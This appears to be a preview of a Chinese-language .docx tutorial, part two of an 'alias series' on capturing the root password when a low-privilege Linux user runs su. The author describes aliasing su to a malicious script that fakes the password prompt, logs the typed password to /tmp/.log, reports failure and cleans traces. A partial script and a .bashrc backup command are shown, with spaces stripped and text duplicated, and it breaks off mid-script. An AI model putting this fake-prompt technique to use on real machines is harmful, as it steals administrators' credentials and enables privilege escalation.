别名系列之二——Linux低权限用户抓取切账户时的密码.docxVIP

别名系列之二——Linux低权限用户抓取切账户时的密码注：最近在做项目的时候，得到一个邮件管理员个人机的普通账户权限，观察该账户history存在多次su-root记录，遂对如何抓取切用户时输入的密码展开思考。实现思路：实现思路同上一篇文章，通过设置别名，替换用户的su命令为执行我的恶意脚本。由于我始终没能解决将密码传参给/bin/su

别名系列之二——Linux低权限用户抓取切账户时的

密码

注：最近在做项目的时候，得到一个邮件管理员个人机的普通账户权限，观察该账户history存在多次su-root记录，遂对如何抓取切用户时输入的密码展开思考。

实现思路：

实现思路同上一篇文章，通过设置别名，替换用户的su命令为执行我的恶意脚本。由于我始终没能解决将密码传参给/bin/su的问题，于是恶意脚本负责伪造一次认证，记录密码后回显密码错误，并清理痕迹。

具体步骤：

为了伪造一次认证，首先观察在su-root时，正常的回显

于是相应的Shell脚本为

执行一下脚本看看结果，可以看见几乎没有区别

然后备份该用户的.bashrc文件

cp-p.bashrc/tmp/.bashrc

#!/bin/bash

echo-ePassword:\cread-spass

echo$pass/tmp/.logecho